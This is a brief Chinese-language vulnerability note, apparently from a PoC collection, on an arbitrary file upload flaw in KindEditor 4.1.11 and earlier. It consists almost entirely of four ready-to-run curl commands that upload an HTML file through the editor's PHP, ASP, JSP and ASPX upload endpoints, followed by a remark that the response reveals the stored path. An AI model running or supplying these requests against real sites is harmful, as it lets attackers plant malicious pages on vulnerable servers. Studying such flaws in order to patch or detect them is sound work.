kindeditor上传漏洞
漏洞影响¶
kindeditor <= 4.1.11
漏洞POC¶
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file
```返回值为路径